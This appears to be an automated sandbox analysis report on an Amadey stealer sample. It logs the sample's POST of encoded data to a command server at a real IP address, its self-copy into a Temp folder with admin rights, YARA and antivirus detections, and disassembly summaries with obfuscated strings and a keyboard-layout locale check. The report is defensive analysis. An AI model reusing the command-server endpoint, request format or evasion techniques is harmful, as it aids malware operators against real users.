Jul 26, 2024 13:55:45.865461111 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 13:55:46.806298018 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:55:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Target ID:	0
Start time:	07:53:09
Start date:	26/07/2024
Path:	C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe"
Imagebase:	0x900000
File size:	1'920'000 bytes
MD5 hash:	5AA3B4D694BC828650C63ADE641F4581
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.1468832489.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.1428535322.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	07:53:13
Start date:	26/07/2024
Path:	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"
Imagebase:	0xe20000
File size:	1'920'000 bytes
MD5 hash:	5AA3B4D694BC828650C63ADE641F4581
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000002.3855298883.0000000000E21000.00000040.00000001.01000000.00000008.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000003.1474858730.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	07:54:00
Start date:	26/07/2024
Path:	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Imagebase:	0xe20000
File size:	1'920'000 bytes
MD5 hash:	5AA3B4D694BC828650C63ADE641F4581
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000008.00000003.1931905598.0000000004E10000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000008.00000002.1972443019.0000000000E21000.00000040.00000001.01000000.00000008.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Function 04E20BA6 Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1470598519.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e20000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49de909cf796f3761a5c1a5f1f5d9f37a676672e09120713b3ff135a8c633f02
Instruction ID: 3d3ee3b0675f9d2bd504244329e8b71bdcef5712b973837502571181020cc89a
Opcode Fuzzy Hash: 49de909cf796f3761a5c1a5f1f5d9f37a676672e09120713b3ff135a8c633f02
Instruction Fuzzy Hash: 65210AEB30E0317EF20285612F59AFB6B6EE7D32303319866F542C6583E359665D6131

Function 04E20B3C Relevance: .2, Instructions: 166COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1470598519.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e20000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58e41b8552e7b0a0bec670a9b1e1931c93d463d5730e498bf2276f05d97934f1
Instruction ID: d51c7b81a3a24462f488666c1e2b3b009303cdac9948e2427b8cde20af666115
Opcode Fuzzy Hash: 58e41b8552e7b0a0bec670a9b1e1931c93d463d5730e498bf2276f05d97934f1
Instruction Fuzzy Hash: 1F3105EB24D131BEF11285612B18AFB6B6EE7D3330331986AF643C6583F2956A4D6131

Function 04E20BB2 Relevance: .2, Instructions: 165COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1470598519.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e20000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66611b9c6f5600faff698c1013e502e47d02f13f4d91c922540126e3c4597bd0
Instruction ID: aa39c122617897cca553698049ac31c249074dce4a76954c041486d0048bb907
Opcode Fuzzy Hash: 66611b9c6f5600faff698c1013e502e47d02f13f4d91c922540126e3c4597bd0
Instruction Fuzzy Hash: AD316BEB30D131BEF11285512F14AFB6B6DE7D2330730986AF642C6482F295664D2131

Function 04E20B76 Relevance: .2, Instructions: 155COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1470598519.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e20000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d549604e1fabcc0de606d112f48f49d5ea99f77e463e72fca9da9a0b93c323
Instruction ID: 390b60dec238ff6218005d23013ae476114b765d17ac153948759b65b0a2dad0
Opcode Fuzzy Hash: a3d549604e1fabcc0de606d112f48f49d5ea99f77e463e72fca9da9a0b93c323
Instruction Fuzzy Hash: 3B317EE720D1607EE21286611B59AFB7B6DEBD3330330946BF642C6583F256664E6131

Function 04E20B56 Relevance: .2, Instructions: 150COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1470598519.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e20000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9fd4fd096e3f05ef2b842e48ec7baed1d19ddc6fc601e091ebec989a9cc7ccfc
Instruction ID: d1b74bdd4cec6065de775406c4985d2a7077f60ba76997e9f6b3d6dac803a7e3
Opcode Fuzzy Hash: 9fd4fd096e3f05ef2b842e48ec7baed1d19ddc6fc601e091ebec989a9cc7ccfc
Instruction Fuzzy Hash: 1A3139EB30D131BEF11286612B55AFB6B6EE7D2230331D86BF642C6583F2956A4D2131

Function 04E20B62 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1470598519.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e20000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c98c8f2b7aa61e16baa1c307478fc166e09900e980888c777d9b701a6ad3bbd
Instruction ID: 5b56c841dd97ebc616365a4e3266140311bc3f41449719946d6153c9d1221a79
Opcode Fuzzy Hash: 4c98c8f2b7aa61e16baa1c307478fc166e09900e980888c777d9b701a6ad3bbd
Instruction Fuzzy Hash: 51314DEB30D131BEF11285612B55AFB6B6EEBD3330330D86AF542C5583F255664D6131

Function 04E20BCC Relevance: .1, Instructions: 144COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1470598519.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e20000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 278b5059fb5d4297e3854be8f15ef654b2bacdb696509f43d0c35972d4da19f8
Instruction ID: 294716691bb8ce05257b85ac20b805170cce08937b3cc425b00725a0a954d990
Opcode Fuzzy Hash: 278b5059fb5d4297e3854be8f15ef654b2bacdb696509f43d0c35972d4da19f8
Instruction Fuzzy Hash: E6315CEB20D131BEE21286612B54AFB6B7EF7D3330331D866F542C5583E2556A4D6131

Function 04E20C0B Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1470598519.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e20000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab78bcda5808104cce9bfc73ee37d461e3717193ae70b3d5a86ff92bf5090394
Instruction ID: 5929f5cfc7c2d89f5aa11ebe163e3847aee782bba4ccd32e997bc5b6ff3c9697
Opcode Fuzzy Hash: ab78bcda5808104cce9bfc73ee37d461e3717193ae70b3d5a86ff92bf5090394
Instruction Fuzzy Hash: B721FBFB20E1317EF20296612B59AFB6B6DEAD3230331947AF542C6447E24A564E6131

Function 04E20C39 Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1470598519.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e20000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ffe4115306a5a7a644fad04add2a9c83dd8ad3699790298c6ad2f5effb12545
Instruction ID: 50cdcd84cc7355119c1a6a5673ff23c86c6808c282b7aa45961a4686b124fc02
Opcode Fuzzy Hash: 6ffe4115306a5a7a644fad04add2a9c83dd8ad3699790298c6ad2f5effb12545
Instruction Fuzzy Hash: 95112CFB20E1717EF10286712B696FB6B69E6D3230331D87BF542C6447F249564D6131

Function 04E20C45 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1470598519.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e20000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ae8078cd73a01ebd64dddd0ce1ff3a71a8bd3fdffb9c6d74c7dba6b4f65c1bc
Instruction ID: 021a5b066ea0fe399c093577cc72e39c8b1bb97e165357062a4e821f05366673
Opcode Fuzzy Hash: 9ae8078cd73a01ebd64dddd0ce1ff3a71a8bd3fdffb9c6d74c7dba6b4f65c1bc
Instruction Fuzzy Hash: F41150EB20D1307EF10286712B695FB6B79E6D3230335C87BF542C2443F24A564D6131

Function 04E20CF7 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1470598519.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e20000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aedfc028d5133b9d28f72f42aacf9bec2218ad6b2a229692273291d626982b71
Instruction ID: 2ca4183edfbe85f6f199d8d1497535788cc676f956cdb02af9437a808d535f2d
Opcode Fuzzy Hash: aedfc028d5133b9d28f72f42aacf9bec2218ad6b2a229692273291d626982b71
Instruction Fuzzy Hash: BE117FA720F1607FE30295751F186F76F78EBD3530334886BF141C6083E256524E5231

Function 04E20C5B Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1470598519.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e20000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f00d88a1f12c954a945e62f070386149bc88062402aa27663af8f950887056a
Instruction ID: 3dd2df6fe226ffbd20db95f9d5a70e48ba81de629d71b197b645a7fe99862d08
Opcode Fuzzy Hash: 9f00d88a1f12c954a945e62f070386149bc88062402aa27663af8f950887056a
Instruction Fuzzy Hash: 7A117BFB20E120BFF202D6712B599FB7B69EAD3230331C86BF542C2443E216164D5231

Function 04E20C7F Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1470598519.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e20000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9fbafd91a628295a47263b3735be99daac73e28d620f539357a81e5f860f247e
Instruction ID: 9dab49dcfa53b4e51094f152684b1381f2483c418458d2963481ee2bfab5a96c
Opcode Fuzzy Hash: 9fbafd91a628295a47263b3735be99daac73e28d620f539357a81e5f860f247e
Instruction Fuzzy Hash: 231180FB20E1717EF30292712B59AFBAB69EAD3130334987BF542C7487E24A564E5131

Function 04E20C97 Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1470598519.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e20000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fce370b46c799285f7ae6c7f2d5ad4e9e17f3d5fbf2796648d3f714eaa844106
Instruction ID: d4732dd5c13de67469c59f32d490e02a73368680c7abec2082ddd33785699bd8
Opcode Fuzzy Hash: fce370b46c799285f7ae6c7f2d5ad4e9e17f3d5fbf2796648d3f714eaa844106
Instruction Fuzzy Hash: 741140B720E160BFF20286716F156FBBB79EAD323033488ABF542C7447E24A565D5231

Non-executed Functions

Function 04E20938 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1470598519.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e20000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96c426666cd7c30a729bc6ff852b073d993cef28e41b1dc052213a1bd7d0659a
Instruction ID: 60f46e211daf21cffb981d6fa637889779034cec927ae1c2138b247887d3d4b8
Opcode Fuzzy Hash: 96c426666cd7c30a729bc6ff852b073d993cef28e41b1dc052213a1bd7d0659a
Instruction Fuzzy Hash: D4F0F6E67483B0AFF182869517982F67B6DF7D7230330507AE703C5683F6C669051061

Analysis Process: explorti.exePID: 1152, Parent PID: 6536COMMON

Execution Graph

Execution Coverage:	8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	17.5%
Total number of Nodes:	987
Total number of Limit Nodes:	81

Executed Functions

Function 00E2BD60 Relevance: 21.3, APIs: 5, Strings: 7, Instructions: 310
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenW.WININET(00E78D68,00000000,00000000,00000000,00000000), ref: 00E2BDED
InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 00E2BE11
HttpOpenRequestA.WININET(?,00000000), ref: 00E2BE5A
HttpSendRequestA.WININET(?,00000000), ref: 00E2BF1A
InternetReadFile.WININET(?,?,000003FF,?), ref: 00E2BFCD
InternetCloseHandle.WININET(?), ref: 00E2C0A7
InternetCloseHandle.WININET(?), ref: 00E2C0AF
InternetCloseHandle.WININET(?), ref: 00E2C0B7

Strings

d4, xrefs: 00E2E2FF
PG3NVu==, xrefs: 00E2BE33
PoPn, xrefs: 00E2D516
stoi argument out of range, xrefs: 00E2E3FA
6JLUcxtnEx==, xrefs: 00E2C2EB, 00E2C543
6JLUcBRYEz9=, xrefs: 00E2C385
invalid stoi argument, xrefs: 00E2E404

Memory Dump Source

Source File: 00000002.00000002.3855298883.0000000000E21000.00000040.00000001.01000000.00000008.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000002.00000002.3855242120.0000000000E20000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855298883.0000000000E82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855647219.0000000000E89000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000000E8B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001020000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.00000000010F8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001125000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001131000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.000000000113E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856172584.000000000113F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856739752.00000000012E1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856780942.00000000012E3000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e20000_explorti.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandle$HttpOpenRequest$ConnectFileReadSend
String ID: 6JLUcBRYEz9=$6JLUcxtnEx==$PG3NVu==$PoPn$d4$invalid stoi argument$stoi argument out of range
API String ID: 688256393-3362026881
Opcode ID: 6222fa1b23806803399ce5e8af0bcd06b5494f056c2a2c1c97a032a24d3d5724
Instruction ID: 3f31d3ec5a66a6b6091e0e684d09dec3bcc55101967b5db3fb9d62bd2c0ca24e
Opcode Fuzzy Hash: 6222fa1b23806803399ce5e8af0bcd06b5494f056c2a2c1c97a032a24d3d5724
Instruction Fuzzy Hash: 2AB1F7B1600128DBEB24CF28DC85BEEBBB5EF45304F6055A9F508A72D1DB719AC0CB95

Function 00E3D312 Relevance: 2.7, Strings: 2, Instructions: 172
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00E2247E

Strings

'k, xrefs: 00E3D324, 00E3DCA4
'k, xrefs: 00E3DCEC

Memory Dump Source

Source File: 00000002.00000002.3855298883.0000000000E21000.00000040.00000001.01000000.00000008.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000002.00000002.3855242120.0000000000E20000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855298883.0000000000E82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855647219.0000000000E89000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000000E8B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001020000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.00000000010F8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001125000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001131000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.000000000113E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856172584.000000000113F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856739752.00000000012E1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856780942.00000000012E3000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e20000_explorti.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: 'k$'k
API String ID: 2659868963-823418499
Opcode ID: 0a73c5b7f96b1ea76645b08a74206e75904f1025a61e378cd2c660657e6a644b
Instruction ID: 5339d34f09a607eff7897566f9405ca58b2afce663b1ffd87d0676fc6c101e7a
Opcode Fuzzy Hash: 0a73c5b7f96b1ea76645b08a74206e75904f1025a61e378cd2c660657e6a644b
Instruction Fuzzy Hash: 4A519CB2D046058FDB19CF66EC897AABBF0FB08314F24966AD818FB254D7309944CF50

Function 00E346C0 Relevance: 37.0, APIs: 1, Strings: 22, Instructions: 2484COMMON

Download Yara Rule

APIs

Part of subcall function 00E37870: __Cnd_unregister_at_thread_exit.LIBCPMT ref: 00E3795C
Part of subcall function 00E37870: __Cnd_destroy_in_situ.LIBCPMT ref: 00E37968
Part of subcall function 00E37870: __Mtx_destroy_in_situ.LIBCPMT ref: 00E37971

Part of subcall function 00E2BD60: InternetOpenW.WININET(00E78D68,00000000,00000000,00000000,00000000), ref: 00E2BDED
Part of subcall function 00E2BD60: InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 00E2BE11
Part of subcall function 00E2BD60: HttpOpenRequestA.WININET(?,00000000), ref: 00E2BE5A

std::_Xinvalid_argument.LIBCPMT ref: 00E34EA2

Strings

KIK+, xrefs: 00E347BD, 00E348EC, 00E34ADC, 00E34C0B
7470, xrefs: 00E3531D
9YY0, xrefs: 00E353CC
stoi argument out of range, xrefs: 00E34269, 00E34EAC
9pG0, xrefs: 00E354DB
8IG0, xrefs: 00E353F5
246122658369, xrefs: 00E34F4D, 00E34F8F, 00E34F99, 00E354F4
6YK0, xrefs: 00E35502
-, xrefs: 00E34F3A
IEYUMK==, xrefs: 00E354B9
KIG+, xrefs: 00E34776, 00E347ED, 00E34A95, 00E34B0C
75G0, xrefs: 00E35470
UIU0, xrefs: 00E353A3
0657d1, xrefs: 00E35489
Dy==, xrefs: 00E3369E, 00E34D2D
Toe0, xrefs: 00E35447
85K3cq==, xrefs: 00E34712
TZC0, xrefs: 00E3541E
8lU=, xrefs: 00E36383, 00E36652
TZS0, xrefs: 00E3537A
7JS0, xrefs: 00E35351
84K0, xrefs: 00E35497

Memory Dump Source

Source File: 00000002.00000002.3855298883.0000000000E21000.00000040.00000001.01000000.00000008.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000002.00000002.3855242120.0000000000E20000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855298883.0000000000E82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855647219.0000000000E89000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000000E8B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001020000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.00000000010F8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001125000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001131000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.000000000113E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856172584.000000000113F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856739752.00000000012E1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856780942.00000000012E3000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e20000_explorti.jbxd

Yara matches

Similarity

API ID: InternetOpen$Cnd_destroy_in_situCnd_unregister_at_thread_exitConnectHttpMtx_destroy_in_situRequestXinvalid_argumentstd::_
String ID: 0657d1$246122658369$6YK0$7470$75G0$7JS0$84K0$85K3cq==$8IG0$8lU=$9YY0$9pG0$Dy==$IEYUMK==$KIG+$KIK+$TZC0$TZS0$Toe0$UIU0$stoi argument out of range$-
API String ID: 2414744145-2495505580
Opcode ID: 01d492b40efd3f7651b630634b7d8fa04ab322753e3049e3f9e972ba694bb4c5
Instruction ID: 044278c1b51385b418be94736f70e98ae51000ec47fd2dd416d9e7020aded8b2
Opcode Fuzzy Hash: 01d492b40efd3f7651b630634b7d8fa04ab322753e3049e3f9e972ba694bb4c5
Instruction Fuzzy Hash: 2C231471E002589BEB19DB28CD8979DBFB6AB81304F5091D8E048BB2D6DB359F84CF51

Function 00E25DF0 Relevance: 14.4, APIs: 2, Strings: 6, Instructions: 364
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

.k, xrefs: 00E25B52, 00E25B6F, 00E25C09, 00E259C7, 00E25C82
00000422, xrefs: 00E25FD9
Keyboard Layout\Preload, xrefs: 00E25F64
00000419, xrefs: 00E25FA8
0000043f, xrefs: 00E2603B
00000423, xrefs: 00E2600A

Memory Dump Source

Source File: 00000002.00000002.3855298883.0000000000E21000.00000040.00000001.01000000.00000008.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000002.00000002.3855242120.0000000000E20000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855298883.0000000000E82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855647219.0000000000E89000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000000E8B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001020000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.00000000010F8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001125000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001131000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.000000000113E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856172584.000000000113F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856739752.00000000012E1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856780942.00000000012E3000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e20000_explorti.jbxd

Yara matches

Similarity

API ID:
String ID: .k$00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
API String ID: 0-2202280731
Opcode ID: ace5b68c15171015e07d85c5c92d8cc4ca11409202a440915124bae7825f945c
Instruction ID: 326861b7bffa8da34366f0c7e62c7486c2baf93decda281b79b1d79c4531a2c5
Opcode Fuzzy Hash: ace5b68c15171015e07d85c5c92d8cc4ca11409202a440915124bae7825f945c
Instruction Fuzzy Hash: 51E18C71900228ABEB24DBA4CD8DB9EB7B9EF14304F5042D9E508B7291DB749BC4CF91

Function 00E27D00 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 392
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00E27EA3

Strings

HlusMa==, xrefs: 00E2810A
HlurOK==, xrefs: 00E28062
HlurNa==, xrefs: 00E281B2

Memory Dump Source

Source File: 00000002.00000002.3855298883.0000000000E21000.00000040.00000001.01000000.00000008.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000002.00000002.3855242120.0000000000E20000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855298883.0000000000E82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855647219.0000000000E89000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000000E8B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001020000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.00000000010F8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001125000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001131000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.000000000113E000.00000040.00000001.01000000.00000008.sdmpDownload File
